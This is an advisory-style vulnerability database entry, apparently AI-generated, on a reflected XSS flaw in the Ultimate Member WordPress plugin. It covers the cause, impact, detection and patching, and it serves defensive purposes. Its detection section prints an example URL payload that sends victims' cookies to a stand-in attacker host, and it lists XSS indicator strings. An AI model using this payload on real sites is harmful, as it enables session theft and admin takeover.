
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-1404 is a Reflected Cross-Site Scripting (XSS) vulnerability in the Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin for WordPress. It affects all versions up to and including 2.11.1, stemming from insufficient input sanitization and output escaping on filter parameters such as filter_first_name. Unauthenticated attackers can inject arbitrary web scripts into pages that execute when a victim clicks a crafted link. It carries a CVSS v3.1 base score of 6.1 (Medium) (Red Hat CVE, Vulners).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation – Cross-Site Scripting), specifically the reflected variant (CAPEC-591). The plugin fails to properly sanitize user-supplied input in filter parameters (e.g., filter_first_name) passed via HTTP GET/POST requests, and does not escape the values before rendering them in the HTML response. An unauthenticated attacker crafts a malicious URL containing a JavaScript payload in one of these filter parameters; when a logged-in user (such as an administrator) clicks the link, the script executes in their browser context. A Nuclei detection template was submitted to the ProjectDiscovery community repository, indicating the attack surface is well-understood (Nuclei Templates PR, Infinitsec).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser session, potentially leading to session token theft, credential harvesting, or unauthorized actions performed on behalf of the victim. Because the scope is changed (S:C in CVSS), the injected script can affect resources beyond the vulnerable component itself, such as the victim's browser environment and any data accessible within it. If the victim is a privileged WordPress user (e.g., administrator), the attacker could leverage the XSS to install malicious plugins, create rogue admin accounts, or perform site takeover actions (Red Hat CVE, Sucuri Blog).
The vulnerability requires no authentication and has low attack complexity, though it does require user interaction (a victim must click a crafted link). The EPSS score is approximately 0.065% (0.000650), indicating a relatively low but non-negligible probability of exploitation in the wild. A Nuclei template pull request was submitted to ProjectDiscovery's community repository, and a GitHub exploit reference has been indexed by Vulners, suggesting public PoC or detection tooling exists (Nuclei Templates PR, Vulners Exploit). No CISA KEV listing or confirmed in-the-wild exploitation campaigns have been reported as of the available data.
inurl:/wp-content/plugins/ultimate-member).filter_first_name.https://target.com/members/?filter_first_name=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>/members/) containing URL-encoded script tags or JavaScript event handlers in filter parameters such as filter_first_name, filter_last_name, or similar.<script>, javascript:, onerror=, onload=, or other XSS indicators in filter fields.Users should update the Ultimate Member plugin to a version beyond 2.11.1 that includes a patch for this vulnerability; check the official WordPress plugin repository for the latest release. As a temporary workaround, site administrators can restrict access to member directory pages to authenticated users only, reducing the attack surface by limiting who can be targeted with crafted links. Additionally, deploying a Web Application Firewall (WAF) with XSS filtering rules can help detect and block exploitation attempts while a patch is applied (Sucuri Blog, Red Hat CVE).
Sucuri included CVE-2026-1404 in their February 2026 vulnerability patch roundup, highlighting it as one of several WordPress plugin issues requiring attention (Sucuri Blog). A Nuclei template was submitted to the ProjectDiscovery community repository, reflecting security researcher interest in building automated detection for this vulnerability (Nuclei Templates PR). Overall community reaction appears measured given the Medium severity rating and the requirement for user interaction.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."